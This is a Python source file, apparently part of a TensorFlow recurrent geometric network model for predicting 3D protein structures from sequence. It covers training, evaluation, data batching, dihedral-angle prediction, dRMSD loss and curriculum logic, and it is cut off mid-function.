evaluation_dict = ops_to_dict(
session,
merge_dicts(
self._evaluation_ops,
self._last_evaluation_ops))
# write event summaries to disk
if self.config.io['log_model_summaries']:
self._summary_writer.add_summary(
evaluation_dict['merged_summaries_op'],
global_step=evaluation_dict['global_step'])
# remove non-user facing ops
if pretty:
[evaluation_dict.pop(k) for k in list(evaluation_dict.keys()) if 'op' in k]
return evaluation_dict
else:
raise RuntimeError('Model has not been started or has already finished.')
def _predict(self, session):
"""Predict 3D structures.
Args:
session: tf session
Returns:
dict of prediction
"""
if RGNModel._is_started:
# evaluate prediction dict
prediction_dict = ops_to_dict(session, self._prediction_ops)
# process tertiary sequences
if 'coordinates' in prediction_dict:
prediction_dict['coordinates'] = np.transpose(
prediction_dict['coordinates'], (1, 2, 0))
# generate return dict
predictions = {}
for id_, num_steps, tertiary, recurrent_states \
in zip_longest(*[prediction_dict.get(key, []) \
for key in ['ids', 'num_stepss', 'coordinates', 'recurrent_states']]):
prediction = {}
if tertiary is not None:
last_atom = (num_steps - self.config.io['num_edge_residues']) * NUM_DIHEDRALS
prediction.update({'tertiary': tertiary[:, :last_atom]})
prediction.update({'recurrent_states': recurrent_states})
predictions.update({id_: prediction})
return predictions
else:
raise RuntimeError('Model has not been started or has already finished.')
def _diagnose(self, session, pretty=True):
""" Compute diagnostic measurements
Ex. weight norms and curriculum quantiles.
Args:
session: tf session
pretty: pretty print
Returns:
diagnostic dict
"""
# for k, v in self._diagnostic_ops.items():
# print("KEY: ", k, " VALUE: ", v)
diagnostic_dict = ops_to_dict(session, self._diagnostic_ops)
# write event summaries to disk
if self.config.io['log_model_summaries']:
for op in ['merged_summaries_op', 'base_merged_summaries_op']:
self._summary_writer.add_summary(
diagnostic_dict[op],
global_step=diagnostic_dict['global_step'])
# compute max/min of vars and grads
vars_ = [diagnostic_dict['v' + str(i)] \
for i in range(self._grads_and_vars_length)]
grads = [diagnostic_dict['g' + str(i)] \
for i in range(self._grads_and_vars_length)]
diagnostic_dict.update({
'min_weight': np.min([np.min(var) for var in vars_]),
'max_weight': np.max([np.max(var) for var in vars_]),
'min_grad': np.min([np.min(grad) for grad in grads]),
'max_grad': np.max([np.max(grad) for grad in grads])})
# compute curriculum quantiles if applicable.
if self.config.curriculum['mode'] == 'loss':
quantiles = cum_quantile_positions(
diagnostic_dict['flat_curriculum_weights'])
diagnostic_dict.update({'curriculum_quantiles': quantiles})
elif self.config.curriculum['mode'] == 'length':
diagnostic_dict.update({'curriculum_quantiles': float('nan')})
# remove non-user facing ops and tensors
if pretty:
diagnostic_dict.pop('flat_curriculum_weights', None)
for i in range(self._grads_and_vars_length):
diagnostic_dict.pop('v' + str(i))
diagnostic_dict.pop('g' + str(i))
return diagnostic_dict
def _start(self, evaluation_models, session=None,
restore_if_checkpointed=True):
"""Initializes model from scratch or loads state from disk.
Must be run once (and only once) before model is used.
Args:
evaluation_models: multiple models for eval
session: tf session
        restore_if_checkpointed: whether to restore from the latest checkpoint if one exists
Returns:
session
"""
if not RGNModel._is_started:
# Checkpointing. Must be done here after all models have been instantiated,
# because evaluation models may introduce additional variables
self._saver = tf.train.Saver(
max_to_keep=self.config.io['max_checkpoints'],
keep_checkpoint_every_n_hours=self.config.io['checkpoint_every_n_hours'])
# variable tracking and summarization. it has to be done here
# after all models have been instantiated
model_names = set(
[model.config.io['name'] for model in evaluation_models] \
+ [self.config.io['name']])
if self.config.io['log_model_summaries']:
# add histogram and scalar summaries losses
for model_name in model_names:
for coll in ['tertiary_losses', 'losses']:
for node in tf.get_collection(model_name + '_' + coll):
tf.summary.scalar(
node.name,
node,
collections=[model_name + '_' + tf.GraphKeys.SUMMARIES])
if self.config.io['detailed_logs']:
# additional detailed summaries for losses
for model_name in model_names:
for coll in ['scess', 'matches', 'drmsdss', tf.GraphKeys.ACTIVATIONS]:
for node_or_named_output in tf.get_collection(model_name + '_' + coll):
if type(node_or_named_output) is tf.Tensor:
tf.summary.histogram(
node_or_named_output.name,
node_or_named_output,
collections=[model_name + '_' + tf.GraphKeys.SUMMARIES])
elif type(node_or_named_output) is layers.utils.NamedOutputs:
tf.summary.histogram(
node_or_named_output[1].name,
node_or_named_output[1],
collections=[model_name + '_' + tf.GraphKeys.SUMMARIES])
# summaries for trainable variables and their activations
for var in tf.trainable_variables():
tf.summary.histogram(var.name, var)
layers.summarize_activations()
# add housekeeping training ops that merge and write summaries
self._summary_writer = tf.summary.FileWriter(
self.config.io['logs_directory'])
self._diagnostic_ops.update({
'global_step': self._global_step,
# leftovers not covered by model-specific 'summaries'
'base_merged_summaries_op': tf.summary.merge_all(),
'merged_summaries_op': tf.summary.merge_all(
self.config.io['name'] + '_' + tf.GraphKeys.SUMMARIES)})
# ditto for evaluation models
for model in evaluation_models:
if model.mode == 'evaluation':
model._summary_writer = self._summary_writer
model._last_evaluation_ops.update({
'global_step': self._global_step,
'merged_summaries_op': tf.summary.merge_all(
model.config.io['name'] + '_' + tf.GraphKeys.SUMMARIES)})
# start session with appropriate device settings if no Session is passed
if self.config.computing['fill_gpu']:
gpu_fraction = None
else:
gpu_fraction = self.config.computing['gpu_fraction']
if session is None:
session = tf.Session(
config=tf.ConfigProto(
allow_soft_placement=False,
inter_op_parallelism_threads=self.config.computing['num_cpus'],
intra_op_parallelism_threads=self.config.computing['num_cpus'],
gpu_options=tf.GPUOptions(
per_process_gpu_memory_fraction=gpu_fraction,
allow_growth=self.config.computing['allow_gpu_growth'])))
# retrieve latest checkpoint, if any
latest_checkpoint = tf.train.latest_checkpoint(
self.config.io['checkpoints_directory'])
# restore latest checkpoint if found, initialize from scratch otherwise.
if not restore_if_checkpointed or latest_checkpoint is None:
tf.global_variables_initializer().run(session=session)
tf.local_variables_initializer().run(session=session)
else:
self._saver.restore(session, latest_checkpoint)
tf.local_variables_initializer().run(session=session)
# start coordinator and queueing threads
self._threads = tf.train.start_queue_runners(
sess=session, coord=self._coordinator)
RGNModel._is_started = True
# expose new methods and hide old ones
self.train = self._train
self.diagnose = self._diagnose
self.save = self._save
self.is_done = self._is_done
self.current_step = self._current_step
self.finish = self._finish
del self.start
return session
else:
raise RuntimeError('Model already started.')
def _save(self, session):
"""Checkpoints current model.
Args:
session: tf session
Returns:
tf saver
"""
checkpoints_dir = self.config.io['checkpoints_directory']
if not os.path.exists(checkpoints_dir):
os.makedirs(checkpoints_dir)
saver = self._saver.save(
session,
checkpoints_dir,
global_step=self._global_step)
return saver
def _is_done(self):
"""Returns True if training is finished, False otherwise. """
return self._coordinator.should_stop()
def _current_step(self, session):
"""Returns the current global step. """
return session.run(self._global_step)
def _finish(self, session, save=True, close_session=True, reset_graph=True):
""" Instructs the model to shutdown.
Returns:
None
"""
self._coordinator.request_stop()
self._coordinator.join(self._threads)
if save:
self.save(session)
if self.config.io['log_model_summaries']:
self._summary_writer.close()
if close_session:
session.close()
if reset_graph:
tf.reset_default_graph()
RGNModel._num_models = 0
RGNModel._is_started = False
del self.train, self.diagnose, self.save, \
self.is_done, self.current_step, self.finish
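# --- Editor's note: a hedged lifecycle sketch, not part of the original file. It follows the
# public methods exposed above; building the train_config / eval_config objects happens
# elsewhere in the repo and is assumed here:
#   training_model = RGNModel('training', train_config)
#   eval_model = RGNModel('evaluation', eval_config)
#   session = training_model.start([eval_model])
#   while not training_model.is_done():
#       global_step, ids = training_model.train(session)
#       if global_step % 1000 == 0:
#           print(eval_model.evaluate(session))
#           training_model.save(session)
#   training_model.finish(session)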
### Private functions
# Strictly used internally for RGNModel
# For TF-based ones, they do not carry out proper scoping
# of their internals, as what they produce is meant to be dropped in the main TF
# graph. They are often stateful, producing TF variables that are used by other
# parts of RGNModel. However their behavior is still transparent in the sense
# that they're only passed parameters, not actual TF nodes or ops, and return
# everything that needs to be acted upon by RGNModel. So they don't modify
# the state of anything that's passed to them.
def _device_function_constructor(functions_on_devices={}, default_device=''):
"""Place each operation on the most optimal device.
Args:
        functions_on_devices: dict mapping a device string to a list of op-name substrings
        default_device: device used for all other ops
Returns:
device placement function
"""
def device_function(op):
# can't depend on ordering of items in dicts
for device, funcs in functions_on_devices.items():
if any(((func in op.name) \
or any(func in node.name for node in op.inputs)) for func in funcs):
return device
else:
return default_device
return device_function
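# --- Editor's note: a hedged example, not part of the original file. It pins ops whose names
# (or whose inputs' names) contain the given substrings on a device, and everything else on
# the default device; the substring and device strings below are illustrative:
#   device_fn = _device_function_constructor(
#       functions_on_devices={'/cpu:0': ['point_to_coordinate']},
#       default_device='/gpu:0')
#   # used above as: with tf.device(device_fn): ...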
def _dataflow(config, max_length):
"""Creates TF queues and nodes for inputting and batching data.
Returns only tensors.
Args:
config: config dict containing io, initialization, optimization, queuing
        max_length: maximum sequence length
Returns:
ids: string identifier of records
primaries: [NUM_STEPS, BATCH_SIZE, NUM_AAS]
evolutionaries: [NUM_STEPS, BATCH_SIZE, NUM_EVO_ENTRIES]
secondaries: [NUM_STEPS, BATCH_SIZE]
tertiaries: [(NUM_STEPS - NUM_EDGE_RESIDUES) x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
masks: [NUM_STEPS - NUM_EDGE_RESIDUES, NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE]
num_stepss: max length in the batch
"""
# files
if config['data_files'] is not None:
files = config['data_files']
else:
files = glob(config['data_files_glob'])
# files queue
file_queue = tf.train.string_input_producer(
files,
num_epochs=config['num_epochs'],
shuffle=config['shuffle'],
seed=config['queue_seed'],
capacity=config['file_queue_capacity'],
name='file_queue')
# read instance
inputs = read_protein(
file_queue,
max_length,
config['num_edge_residues'],
config['num_evo_entries'])
# randomization
# https://github.com/tensorflow/tensorflow/issues/5147#issuecomment-271086206
if config['shuffle']:
dtypes = list([x.dtype for x in inputs])
shapes = list([x.get_shape() for x in inputs])
randomizer_queue = tf.RandomShuffleQueue(
capacity=config['batch_queue_capacity'],
min_after_dequeue=config['min_after_dequeue'],
dtypes=dtypes,
seed=config['queue_seed'],
name='randomization_queue')
randomizer_enqueue_op = randomizer_queue.enqueue(inputs)
randomizer_qr = tf.train.QueueRunner(
randomizer_queue,
[randomizer_enqueue_op])
tf.add_to_collection(tf.GraphKeys.QUEUE_RUNNERS, randomizer_qr)
inputs = randomizer_queue.dequeue()
for tensor, shape in zip(inputs, shapes):
tensor.set_shape(shape)
num_steps, keep = inputs[-2:]
# bucketing
if config['bucket_boundaries'] is not None:
batch_fun = tf.contrib.training.bucket_by_sequence_length
batch_kwargs = {'input_length': num_steps,
'bucket_boundaries': config['bucket_boundaries'],
                        'capacity': config['batch_queue_capacity'] // config['batch_size']}
sel_slice = 1
else:
batch_fun = tf.train.maybe_batch
batch_kwargs = {'capacity': config['batch_queue_capacity']}
sel_slice = slice(len(inputs) - 1)
# batching
inputs = batch_fun(
tensors=list(inputs)[:-1],
keep_input=keep,
dynamic_pad=True,
batch_size=config['batch_size'],
name='batching_queue',
**batch_kwargs)
ids, primaries_batch_major, evolutionaries_batch_major, \
secondaries_batch_major, tertiaries_batch_major, \
masks_batch_major, num_stepss = inputs[sel_slice]
# transpose to time_step major
# primary sequences (one-hot sequences of amino acids)
# [NUM_STEPS, BATCH_SIZE, NUM_AAS]
primaries = tf.transpose(
primaries_batch_major,
perm=(1, 0, 2),
name='primaries')
# evolutionary sequences
# (multi-dim evolutionary profiles of amino acid propensities)
# [NUM_STEPS, BATCH_SIZE, NUM_EVO_ENTRIES]
evolutionaries = tf.transpose(
evolutionaries_batch_major,
perm=(1, 0, 2),
name='evolutionaries')
# secondary sequences (sequences of DSSP classes)
# [NUM_STEPS, BATCH_SIZE]
secondaries = tf.transpose(
secondaries_batch_major,
perm=(1, 0),
name='secondaries')
# tertiary sequences (sequences of 3D coordinates)
# [(NUM_STEPS - NUM_EDGE_RESIDUES) x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
tertiaries = tf.transpose(
tertiaries_batch_major,
perm=(1, 0, 2),
name='tertiaries')
# mask matrix for each datum that masks meaningless distances.
# [NUM_STEPS - NUM_EDGE_RESIDUES, NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE]
masks = tf.transpose(
masks_batch_major,
perm=(1, 2, 0),
name='masks')
# assign names to the nameless
ids = tf.identity(ids, name='ids')
num_stepss = tf.identity(num_stepss, name='num_stepss')
return ids, primaries, evolutionaries, secondaries, tertiaries, masks, num_stepss
def _inputs(config, primaries, evolutionaries):
"""Returns final concatenated input for use in recurrent layer.
Args:
config: dictionary of parameters
primaries: [NUM_STEPS, BATCH_SIZE, NUM_AAS]
evolutionaries: [NUM_STEPS, BATCH_SIZE, NUM_EVO_ENTRIES]
Returns:
concated inputs of shape [NUM_STEPS, BATCH_SIZE, XXXX]
where XXXX is one of:
NUM_AAS
NUM_EVO_ENTRIES
NUM_AAS + NUM_EVO_ENTRIES
"""
inputs_list = ([primaries] if config['include_primary'] else []) \
+ ([evolutionaries * config['evolutionary_multiplier']] \
if config['include_evolutionary'] else [])
    if inputs_list:
inputs = tf.concat(inputs_list, 2, name='inputs')
else:
raise RuntimeError('Must include either primaries or evolutionaries inputs.')
return inputs
def _weights(config, masks, curriculum_step=None):
"""Creates dRMSD weights.
Mask meaningless (missing or longer than sequence residues)
pairwise distances and incorporate the state of the curriculum to
differentially weigh pairwise distances based on their proximity.
Args:
config: dict of configurations
masks: [LEN, LEN, BATCH_SIZE]
curriculum_step: tf scalar
Returns:
masked_weights: [MAX_SEQ_LENGTH, MAX_SEQ_LENGTH]
flat_curriculum_weights: [MAX_SEQ_LENGTH - 1]
"""
if config['atoms'] == 'c_alpha':
# no loss-based curriculum
if config['mode'] != 'loss':
# create fixed weighting matrix that weighs all distances equally.
# minus one factor is there because we ignore self-distances.
flat_curriculum_weights = np.ones(
config['num_steps'] - config['num_edge_residues'] - 1,
dtype='float32')
elif config['mode'] == 'loss' and curriculum_step is not None:
# create appropriate weights based on curriculum parameters and current step.
flat_curriculum_weights = curriculum_weights(
base=curriculum_step,
slope=config['slope'],
max_seq_length=config['num_steps'] - config['num_edge_residues'])
else:
raise RuntimeError('Curriculum step tensor not supplied.')
# weighting matrix for entire batch that accounts for curriculum weighting.
# [NUM_STEPS - NUM_EDGE_RESIDUES, NUM_STEPS - NUM_EDGE_RESIDUES]
unnormalized_weights = weighting_matrix(
flat_curriculum_weights,
name='unnormalized_weights')
# create final weights by multiplying with masks and normalizing.
mask_length = tf.shape(masks)[0]
unnormalized_masked_weights = masks * unnormalized_weights[:mask_length, :mask_length, tf.newaxis]
masked_weights = tf.div(
unnormalized_masked_weights,
tf.reduce_sum(unnormalized_masked_weights, axis=[0, 1]),
name='weights')
return masked_weights, flat_curriculum_weights
else:
raise NotImplementedError('Model only supports C alpha atoms for the loss function.')
def _alphabet(mode, config):
"""Creates alphabet for alphabetized dihedral prediction.
Args:
mode: train or predict
config: dict of configs
Returns:
tf alphabet variable (can be trainable)
[ALPHABET_SIZE, NUM_DIHEDRALS]
"""
# prepare initializer
if config['alphabet'] is not None:
# user-defined alphabet
alphabet_initializer = tf.constant_initializer(config['alphabet'])
else:
# random initialization
alphabet_initializer = dict_to_init(
config['alphabet_init'],
config['alphabet_seed'])
# alphabet variable, possibly trainable
alphabet = tf.get_variable(
name='alphabet',
shape=[config['alphabet_size'], NUM_DIHEDRALS],
initializer=alphabet_initializer,
trainable=config['alphabet_trainable']) # [OUTPUT_SIZE, NUM_DIHEDRALS]
# add to WEIGHTS collection if trainable
if mode == 'training' and config['alphabet_trainable']:
tf.add_to_collection(tf.GraphKeys.WEIGHTS, alphabet)
return alphabet
def _dihedrals(mode, config, inputs, alphabet=None):
""" Converts internal representation into dihedral angles.
The optional argument alphabet does not determine whether an alphabet
should be created or not--that's controlled by config. Instead the
option allows the reuse of an existing alphabet.
Args:
mode: train or predict
config: dict of parameters
inputs: inputs to feed
        alphabet: existing alphabet tensor to reuse, if any (see note above)
Returns:
[NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS]
"""
is_training = (mode == 'training')
# output size for linear transform layer (OUTPUT_SIZE)
output_size = config['alphabet_size'] \
if config['is_alphabetized'] \
else NUM_DIHEDRALS
# set up non-linear dihedrals layer(s) if requested
nonlinear_out_proj_size = config['recurrent_nonlinear_out_proj_size']
if nonlinear_out_proj_size is not None:
if config['recurrent_nonlinear_out_proj_normalization'] \
== 'batch_normalization':
nonlinear_out_proj_normalization_fn = layers.batch_norm
nonlinear_out_proj_normalization_fn_opts = {
'center': True,
'scale': True,
'decay': 0.9,
'epsilon': 0.001,
'is_training': tf.constant(is_training),
'scope': 'nonlinear_out_proj_batch_norm',
'outputs_collections': config['name'] + '_' + tf.GraphKeys.ACTIVATIONS}
elif config['recurrent_nonlinear_out_proj_normalization'] \
== 'layer_normalization':
nonlinear_out_proj_normalization_fn = layers.layer_norm
nonlinear_out_proj_normalization_fn_opts = {
'center': True,
'scale': True,
'scope': 'nonlinear_out_proj_layer_norm',
'outputs_collections': config['name'] + '_' + tf.GraphKeys.ACTIVATIONS}
else:
nonlinear_out_proj_normalization_fn = None
nonlinear_out_proj_normalization_fn_opts = None
nonlinear_out_proj_fn = {
'tanh': tf.tanh,
'relu': tf.nn.relu}[config['recurrent_nonlinear_out_proj_function']]
outputs = inputs
for idx, (layer_size, init) in enumerate(zip(
nonlinear_out_proj_size,
config['recurrent_nonlinear_out_proj_init'])):
recurrent_nonlinear_out_proj_init = dict_to_inits(
init,
config['recurrent_nonlinear_out_proj_seed'])
outputs = layers.fully_connected(
outputs,
layer_size,
scope='nonlinear_dihedrals_' + str(idx),
activation_fn=nonlinear_out_proj_fn,
normalizer_fn=nonlinear_out_proj_normalization_fn,
normalizer_params=nonlinear_out_proj_normalization_fn_opts,
weights_initializer=recurrent_nonlinear_out_proj_init['base'],
biases_initializer=recurrent_nonlinear_out_proj_init['bias'],
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS,
variables_collections={
'weights': [tf.GraphKeys.WEIGHTS],
'biases': [tf.GraphKeys.BIASES]})
dihedrals_inputs = outputs
# [NUM_STEPS, BATCH_SIZE, NONLINEAR_DIHEDRALS_LAYER_SIZE]
else:
dihedrals_inputs = inputs
# [NUM_STEPS, BATCH_SIZE, N x RECURRENT_LAYER_SIZE]
# N is 1 or 2 depending on bidirectionality
# set up linear transform variables
recurrent_out_proj_init = dict_to_inits(
config['recurrent_out_proj_init'],
config['recurrent_out_proj_seed'])
linear = layers.fully_connected(
dihedrals_inputs,
output_size,
activation_fn=None,
scope='linear_dihedrals',
weights_initializer=recurrent_out_proj_init['base'],
biases_initializer=recurrent_out_proj_init['bias'],
variables_collections={
'weights': [tf.GraphKeys.WEIGHTS],
'biases': [tf.GraphKeys.BIASES]},
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS)
# [NUM_STEPS, BATCH_SIZE, OUTPUT_SIZE]
# reduce to dihedrals, through an alphabet if specified
if config['is_alphabetized']:
# create alphabet if one is not already there
if alphabet is None:
alphabet = _alphabet(mode, config)
# angularize alphabet if specified
if config['is_angularized']:
alphabet = angularize(alphabet)
# batch or layer normalize linear inputs to softmax
# (stats are computed over all batches and timesteps, effectively flattened)
if config['alphabet_normalization'] == 'batch_normalization':
linear = layers.batch_norm(
linear,
center=True,
scale=True,
decay=0.999,
epsilon=0.001,
is_training=tf.constant(is_training),
scope='alphabet_batch_norm',
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS)
elif config['alphabet_normalization'] == 'layer_normalization':
linear = layers.layer_norm(
linear,
center=True,
scale=True,
scope='alphabet_layer_norm',
outputs_collections=config['name'] + '_' + tf.GraphKeys.ACTIVATIONS)
# softmax for linear to create angle mixtures
# [NUM_STEPS x BATCH_SIZE, OUTPUT_SIZE]
flattened_linear = tf.reshape(linear, [-1, output_size])
probs = tf.nn.softmax(
flattened_linear / config['alphabet_temperature'],
name='probs') # [NUM_STEPS x BATCH_SIZE, OUTPUT_SIZE]
tf.add_to_collection(
config['name'] + '_' + tf.GraphKeys.ACTIVATIONS,
probs)
# dropout alphabet if specified.
# I don't renormalize since final angle is invariant wrt overall scale.
if mode == 'training' and config['alphabet_keep_probability'] < 1:
probs = tf.nn.dropout(
probs,
config['alphabet_keep_probability'],
seed=config['dropout_seed'],
name='dropped_probs')
# form final dihedrals based on mixture of alphabetized angles
num_steps = tf.shape(linear)[0]
batch_size = linear.get_shape().as_list()[1]
# [NUM_STEPS x BATCH_SIZE, NUM_DIHEDRALS]
flattened_dihedrals = reduce_mean_angle(probs, alphabet)
# [NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS]
dihedrals = tf.reshape(
flattened_dihedrals,
[num_steps, batch_size, NUM_DIHEDRALS])
else:
# just linear
dihedrals = linear
# angularize if specified
if config['is_angularized']:
dihedrals = angularize(dihedrals)
# [NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS] (for both cases)
# add angle shift
dihedrals = tf.add(
dihedrals,
tf.constant(
config['angle_shift'],
dtype=tf.float32,
name='angle_shift'),
name='dihedrals')
return dihedrals
def _coordinates(config, dihedrals):
"""Converts dihedrals into full 3D structures.
Args:
config: config dict
dihedrals: [NUM_STEPS, BATCH_SIZE, NUM_DIHEDRALS]
Returns:
[NUM_STEPS x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
"""
# converts dihedrals to points ready for reconstruction.
# [NUM_STEPS x NUM_DIHEDRALS, BATCH_SIZE, NUM_DIMENSIONS]
points = dihedral_to_point(dihedrals)
# converts points to final 3D coordinates.
coordinates = point_to_coordinate(
points,
num_fragments=config['num_reconstruction_fragments'],
parallel_iterations=config['num_reconstruction_parallel_iters'])
return coordinates
def _drmsds(config, coordinates, targets, weights):
"""Computes reduced weighted dRMSD loss (as specified by weights).
Computed between predicted tertiary structures and targets.
Args:
config: dict of config
coordinates: coordinates of predicted
targets: target coordinates
weights: weights of each point
Returns:
dRMSD for each instance
"""
# lose end residues if desired
if config['num_edge_residues'] > 0:
coordinates = coordinates[:-(config['num_edge_residues'] * NUM_DIHEDRALS)]
# if only c_alpha atoms are requested then subsample
# starts at 1 because c_alpha atoms are the second atoms
if config['atoms'] == 'c_alpha':
# [NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE, NUM_DIMENSIONS]
coordinates = coordinates[1::NUM_DIHEDRALS]
# [NUM_STEPS - NUM_EDGE_RESIDUES, BATCH_SIZE, NUM_DIMENSIONS]
targets = targets[1::NUM_DIHEDRALS]
# compute per structure dRMSDs
drmsds = drmsd(
coordinates,
targets,
weights,
name='drmsds') # [BATCH_SIZE]
# add to relevant collections for summaries, etc.
if config['log_model_summaries']:
tf.add_to_collection(config['name'] + '_drmsdss', drmsds)
return drmsds
def _reduce_loss_quotient(config, losses, masks, group_filter, name_prefix=''):
"""Reduces loss according to normalization order.
Args:
config: config dict
losses: batch of losses
masks: batch of masks
group_filter: mask that filters out some losses
name_prefix: name
Returns:
numerator: TF scalar
denominator: TF scalar
"""
normalization = config['tertiary_normalization']
num_edge_residues = config['num_edge_residues']
max_seq_length = config['num_steps']
# will give problematic results if all entries are removed
losses_filtered = tf.boolean_mask(losses, group_filter)
for case in switch(normalization):
if case('zeroth'):
loss_factors = tf.ones_like(losses_filtered)
        elif case('first'):
loss_factors = tf.boolean_mask(
effective_steps(masks, num_edge_residues),
group_filter)
fixed_denominator_factor = float(
max_seq_length - num_edge_residues)
        elif case('second'):
eff_num_stepss = tf.boolean_mask(
effective_steps(masks, num_edge_residues),
group_filter)
loss_factors = (tf.square(eff_num_stepss) - eff_num_stepss) / 2.0
fixed_denominator_factor = float(max_seq_length - num_edge_residues)
fixed_denominator_factor = ((fixed_denominator_factor ** 2) \
- fixed_denominator_factor) / 2.0
numerator = tf.reduce_sum(
loss_factors * losses_filtered,
name=name_prefix + '_numerator')
if config['batch_dependent_normalization'] \
or normalization == 'zeroth':
denominator = tf.reduce_sum(
loss_factors,
name=name_prefix + '_denominator')
else:
denominator = tf.multiply(
tf.cast(tf.size(loss_factors), tf.float32),
fixed_denominator_factor,
name=name_prefix + '_denominator')
return numerator, denominator
def _accumulate_loss(config, numerator, denominator, name_prefix=''):
"""Constructs ops to accumulate and reduce loss.
    It maintains a memory of the lowest loss achieved.
Args:
config: dict of config
numerator: tf scalar
denominator: tf scalar
name_prefix: name
Returns:
accumulated_loss:
min_loss_achieved:
min_loss_op: operation to find min
update_op:
reduce_op:
"""
if config['num_evaluation_invocations'] == 1:
# return simple loss
accumulated_loss = tf.divide(
numerator,
denominator,
name=name_prefix)
update_op = reduce_op = tf.no_op()
else:
# create accumulator variables.
# note that tf.Variable uses name_scope (not variable_scope) for naming,
# which is what's desired in this instance
numerator_accumulator = tf.Variable(
initial_value=0.,
trainable=False,
name=name_prefix + '_numerator_accumulator')
denominator_accumulator = tf.Variable(
initial_value=0.,
trainable=False,
name=name_prefix + '_denominator_accumulator')
# accumulate
with tf.control_dependencies([
numerator,
denominator,
numerator_accumulator,
denominator_accumulator]):
accumulate_numerator = tf.assign_add(
numerator_accumulator,
numerator)
accumulate_denominator = tf.assign_add(
denominator_accumulator,
denominator)
update_op = tf.group(
accumulate_numerator,
accumulate_denominator,
name=name_prefix + '_accumulate_op')
# divide to get final quotient
with tf.control_dependencies([update_op]):
accumulated_loss = tf.divide(
numerator_accumulator,
denominator_accumulator,
name=name_prefix + '_accumulated')
# zero accumulators
with tf.control_dependencies([accumulated_loss]):
zero_numerator = tf.assign(numerator_accumulator, 0.)
zero_denominator = tf.assign(denominator_accumulator, 0.)
reduce_op = tf.group(
zero_numerator,
zero_denominator,
name=name_prefix + '_reduce_op')
min_loss_achieved = tf.Variable(
initial_value=float('inf'),
trainable=False,
name='min_' + name_prefix + '_achieved')
min_loss_op = tf.assign(
min_loss_achieved,
tf.reduce_min([min_loss_achieved, accumulated_loss]),
name='min_' + name_prefix + '_achieved_op')
with tf.control_dependencies([min_loss_op]):
min_loss_achieved = tf.identity(min_loss_achieved)
return accumulated_loss, min_loss_achieved, min_loss_op, update_op, reduce_op
def _training(config, loss):
"""Creates loss optimizer and returns minimization op.
Args:
config: configuration dict
loss: TF scalar
Returns:
global_step: applying the gradients
minimize_op: TF op
grads_and_vars_dict: dict
"""
optimizer_args = lambda o: \
o.__init__.__code__.co_varnames[:o.__init__.__code__.co_argcount]
# select appropriate optimization function and construct arg list based on config
optimizer_func = {
'steepest': tf.train.GradientDescentOptimizer, # doesn't support momentum, unlike autograd
'rmsprop': tf.train.RMSPropOptimizer,
'adam': tf.train.AdamOptimizer,
'momentum': tf.train.MomentumOptimizer,
'adagrad': tf.train.AdagradOptimizer,
'adadelta': tf.train.AdadeltaOptimizer}[config['optimizer']]
optimizer_params = config.keys() & set(optimizer_args(optimizer_func))
optimizer_params_and_values = {param: config[param] for param in optimizer_params}
optimizer = optimizer_func(**optimizer_params_and_values)
# obtain and process gradients
grads_and_vars = optimizer.compute_gradients(loss)
threshold = config['gradient_threshold']
# print(grads_and_vars[0])
# from sys import exit
# exit()
# grads_and_vars = tf.Print(grads_and_vars, [grads_and_vars])
if threshold != float('inf'):
for case in switch(config['rescale_behavior']):
if case('norm_rescaling'):
grads, _ = tf.clip_by_global_norm(
[g for g, _ in grads_and_vars],
threshold)
vars_ = [v for _, v in grads_and_vars]
grads_and_vars = list(zip(grads, vars_))
elif case('hard_clipping'):
grads_and_vars = [
(tf.clip_by_value(g, -threshold, threshold), v)\
for g, v in grads_and_vars]
# apply gradients and return stepping op
global_step = tf.get_variable(
initializer=tf.constant_initializer(0),
shape=[],
trainable=False,
dtype=tf.int32,
name='global_step')
minimize_op = optimizer.apply_gradients(
grads_and_vars,
global_step=global_step)
# dict useful for diagnostics
grads_and_vars_dict = {}
grads_and_vars_dict.update({
('g' + str(i)): g for i, (g, _) in enumerate(grads_and_vars)})
grads_and_vars_dict.update({
('v' + str(i)): v for i, (_, v) in enumerate(grads_and_vars)})
# print(grads_and_vars_dict)
return global_step, minimize_op, grads_and_vars_dict
def _history(config, loss, loss_history=None,
scaling_factor=LOSS_SCALING_FACTOR):
"""Creates op for loss history updating.
Args:
config: dict
loss: TF scalar
loss_history: Tensor of history
scaling_factor:
Returns:
Operation
"""
# op for shifting history, i.e. adding new loss, dropping oldest one
# new_history = tf.concat(
# [loss_history[1:],
# tf.expand_dims(loss * scaling_factor, 0)],
# 0)
new_history = tf.concat(
[loss_history[1:],
[loss * scaling_factor]],
0)
with tf.control_dependencies([new_history]):
update_op = tf.assign(
loss_history,
new_history,
name='update_curriculum_history_op')
return update_op
def _curriculum(config, step, loss_history, dependency_ops):
"""Creates TF ops for maintaining and advancing the curriculum.
Args:
config: config dict
step: tf scalar
loss_history: 1D tensor
dependency_ops: operations to perform beforehand
Returns:
curriculum update
"""
# assign appropriate curriculum increment value
for case in switch(config['behavior']):
if case('fixed_rate'):
# fixed rate, always return same number
increment = tf.constant(
config['rate'],
name='curriculum_increment')
elif case('loss_threshold'):
# return fixed increment if last loss is below threshold, zero otherwise
increment_pred = tf.less(
loss_history[-1],
config['threshold'],
name='curriculum_predicate')
full_increment_func = lambda: tf.constant(
config['rate'],
name='full_curriculum_increment')
zero_increment_func = lambda: tf.constant(
0.0,
name='zero_curriculum_increment')
increment = tf.cond(
increment_pred,
full_increment_func,
zero_increment_func)
elif case('loss_change'):
# predicate for increment type
increment_pred = tf.not_equal(
loss_history[0],
DUMMY_LOSS,
name='curriculum_predicate')
            # increment function used once the loss history is fully populated
def full_increment_func():
lin_seq = tf.expand_dims(
tf.linspace(0., 1., config['change_num_iterations']),
1)
ls_matrix = tf.concat([tf.ones_like(lin_seq), lin_seq], 1)
ls_rhs = tf.expand_dims(loss_history, 1)
ls_slope = tf.matrix_solve_ls(ls_matrix, ls_rhs)[1, 0]
full_increment = tf.div(
